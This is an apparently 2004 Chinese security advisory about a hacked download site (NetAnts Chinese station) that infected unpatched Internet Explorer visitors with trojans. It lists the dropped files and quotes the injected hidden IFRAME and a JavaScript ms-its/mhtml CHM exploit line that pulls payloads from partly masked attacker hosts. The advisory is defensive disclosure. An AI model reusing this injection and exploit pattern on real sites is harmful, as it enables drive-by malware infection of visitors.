2004年4月8日上午9点,安天Arrect Net预警网络上海监控站发现著名共享软件网络蚂蚁中文站有被攻击的可能,并已经影响到很多访问过该站点用户的系统。经过积极联系,作者已经在下午2点将问题页面处理完毕.
由于网络蚂蚁的站点的巨大访问量,为此我们定义此次通告为A级。
经验证用户如果在此前访问网络蚂蚁中文站http://www.netants.com/gb,
如果IE没有安装补丁,会被安装木马Trojan.Win32.StartPage.es。
经过对木马分析特点如下:
该木马为PE可执行文件,长度为 6,656 字节
该木马执行后,有如下行为:连接网站http://hard-???????.com(?是我们做的屏蔽处理)
并获取若干文件,存放到%windir%下:
网络文件 本地文件
/progs/reg33lol.txt \reg33.exe
/progs/secure1a.php \secureb.html
/progs/secure64.php \securea.html
/progs/secure30.php \secure.html
/progs/mssysadv.txt \mssys.exe
/progs/mstaskss.txt \mstaskss.exe
/progs/msstasks.txt \msstasks.exe
/progs/consol32.txt \consol32.exe
/progs/toffel32.txt \toffel32.exe
/progs/dkdial66.txt \dlm.html
/progs/dkdial33.txt \dlm.exe
/progs/dkdial64.txt \dl.html
/progs/dkdial32.txt \dl.exe
这些文件包括以下木马程序:
Trojan.Win32.Harnig.b
Trojan.Win32.Harnig.c
Trojan.Win32.Harnig.d
TrojanDownloader.Win32.Donn.b
...
其中 TrojanDownloader.Win32.Donn.b 又从http://hard-???????.com下载
/progs/d22/irvk.avi 本地命名为appsys.exe
当这些木马完全在受害计算机上运行后,会最终在系统中生成如下文件:
%windir%
toffel32.exe
consol32.exe
mstaskss.exe
mssys.exe
winudp.exe
cmd32.dll
sdsini.ini
secure.html
securea.html
secureb.html
reg33.exe
test
dl.exe
dl.html
dlm.exe
dlm.html
hosts
%system32%
appsys.exe
mstasks1.exe
%system%
teen.exe
%Program Files%\WebSiteViewer
121299.dd
121299.dlr
121299.ico
121299.exe
%windir%\Downloaded Program Files\
load.exe
其中cmd32.dll将注入记事本程序运行。
......
经过对网络蚂蚁中文站页面的简单分析,曾下面内容怀疑为攻击者添加:
<IFRAME SRC="http://www.forced-??????.com/?d=get" WIDTH=1 HEIGHT=1></IFRAME>
这一修改使网络蚂蚁页面被访问后,会通过了连续的IFRAME SRC打开了多个连接,其中包括:
http://www.forced-??????.com/tool.html
而在tools.html中通过IFRAME SRC打开
http://hard-???????.com/dl/fox.php
fox.php中执行了一个
<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'ms-its:mhtml:file://c:\\nosuch.mht!http://hard-???????.com/dl/fox/x.chm::/x.htm'));
</script>
...
在与作者取得联系后,作者初步判断这是网站原有流量统计站点的连接,据此判断,应为流量统计站点遭到攻击,流量统计站点进行了非法活动。由于此事件的原始时间已经难以推断,特别提醒在4月8日下午2点以前访问过网络蚂蚁网站的用户通过反病毒软件或者对照本文异常文件列表检查是否被木马感染。